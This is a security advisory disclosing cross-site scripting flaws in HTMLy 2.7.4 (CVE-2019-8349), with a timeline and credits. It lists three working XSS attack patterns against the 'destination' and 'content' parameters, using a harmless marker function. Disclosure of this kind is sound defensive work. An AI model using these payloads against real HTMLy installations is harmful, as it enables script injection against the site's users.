Multiple Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4


Advisory by Netsparker (now Invicti)
Name: Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4
Affected Software: HTMLy
Affected Versions: 2.7.4
Vulnerability: Cross-Site Scripting
Severity: High
Status: Not Fixed
CVE-ID: CVE-2019-8349
CVSS Score (3.0): CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Invicti Advisory Reference: NS-18-059

Technical Details

URL:" onmouseover=netsparker(0x004191) x="
Parameter Name: destination
Parameter Type: GET
Attack Pattern: x%22+onmouseover%3dnetsparker(0x004191)+x%3d%22

URL:" onmouseover=netsparker(0x00409D) x="
Parameter Name: destination
Parameter Type: GET
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00409D)+x%3d%22

Injection URL:
Parameter Name: content
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>netsparker(0x005D63)</scRipt>

For more information on cross-site scripting vulnerabilities, read the section Cross-site scripting (XSS).

Advisory Timeline

28th November 2018 – First Contact
29th November 2018 – Details Sent
23rd January 2019 – Last Attempt to Contact
18th February 2019 – Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.